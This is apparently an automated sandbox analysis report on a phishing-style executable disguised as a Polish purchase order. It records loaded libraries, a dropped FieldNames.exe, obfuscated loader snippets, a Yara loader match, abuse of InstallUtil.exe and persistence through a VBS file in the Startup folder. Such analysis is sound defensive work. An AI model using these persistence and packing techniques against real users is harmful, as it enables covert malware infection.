Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs

.Net Code: Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777252)),Type.GetTypeFromHandle(sEKTJnFmS9iKlkBOqrf.JSdpYPRbLW(16777284))})

.NET source code contains potential unpacker

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: FieldNames.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.3488fa4.1.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.FieldNames.exe.44d74f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.46e74f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6d80000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2306805654.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123637208.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05F8 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0612
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05B8 push eax; ret	0_2_015E05F2
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0618 push eax; ret	0_2_015E0622
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0608 push eax; ret	0_2_015E0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05B8 push eax; ret	6_2_013C05F2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05F8 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0618 push eax; ret	6_2_013C0622
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0608 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55C3 push edx; retf	6_2_05CB55CA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55D3 push ebx; retf	6_2_05CB55DA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB558C push edx; retf	6_2_05CB55A2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55AB push eax; retf	6_2_05CB55B6
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55A3 push ecx; retf	6_2_05CB55AA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55B7 push ecx; retf	6_2_05CB55C2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB4C1B push 00000048h; retf	6_2_05CB4C22
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB3FDB push ds; retf	6_2_05CB3FE1
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB11CB push cs; retf	6_2_05CB11D2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB406C pushad ; retf	6_2_05CB406D
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1ACD push ss; retf	6_2_05CB1ACE
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1AC3 push ss; retf	6_2_05CB1ACA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A2F push esp; retf	6_2_05CB6A35
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A38 push 699605CBh; retf	6_2_05CB6A3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004024F2 push ds; retf	7_2_0040250D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004011C5 push 25BF6CCCh; retf	7_2_004011CA

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mImcw49DFTBR2Kc4glt'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, OK20t2DmSFhZLKxJ1Za.cs	High entropy of concatenated method names: 'vqkDwJJFoy', 'wdiDfG456s', 'dlCDRgE2bA', 'YWEDom5NSQ', 'lUuDa6iXa8', 'zm311aolGinfrvCjIOu', 'UWwKxqoAcZQGCAw4v7t', 'tV9GoioIABuhWMxSqth', 'G3xHp4obNpoXAlnrXg3', 'B4n61toH1VV5suyhdsF'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, MWjo8yZPThnGCd2dRnI.cs	High entropy of concatenated method names: 'MPuZSkrj56', 'p0YZ7Y8PQI', 'TyvZNNbyoo', 'AuLZAbOt5M', 'kQcZILSfsu', 'TnTZb7gm5T', 'RlUZHuu0sf', 'WExZcU4sBs', 'NNlZ2eQj74', 'DKgZ4ml6yY'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, qg3O71FzVYe2k3vnArU.cs	High entropy of concatenated method names: 'TxBb3JdYSH', 'sJqbvteI3w', 'BiYbEIKfkn', 'OIFb6HtJo5', 'CHRbiFE01x', 'EyQbUIf0ux', 'C6HbxBSxcs', 'bpv7Jg0Shh', 'MgObXHYWLb', 'GG6bmaR8KN'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, sI2PgIFoi615B5KFe1M.cs	High entropy of concatenated method names: 'yIYFq3PUUE', 'mtLFV546g8', 'tZMFMnkwcm', 'rfdFWDT5V8', 'iqFFG5DkqS', 'MebFnLkBya', 'oaTFO8iwSj', 'RHsFjU9SFY', 'SbKF895fQ0', 'PFXFLFUrZ1'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	High entropy of concatenated method names: 'yDIx0B9KxRLPlWDAa9H', 'sRNQqK99VsPxOTvJQLY', 'MA8FFs65OY', 'aK0nDa9sKbZkFDdRABx', 'uapS7a95TTeO3EHF4ui', 'qfXcWp9pPB2bFtNTbBw', 'sPkJIK9TBdJKUrGmidE', 'mDNUjH9uZNfDLRCKLTw', 'ytDeOL9qFoo1owG0jR3', 'APj8aC9Vvsf7TDvNNne'

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\FieldNames.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
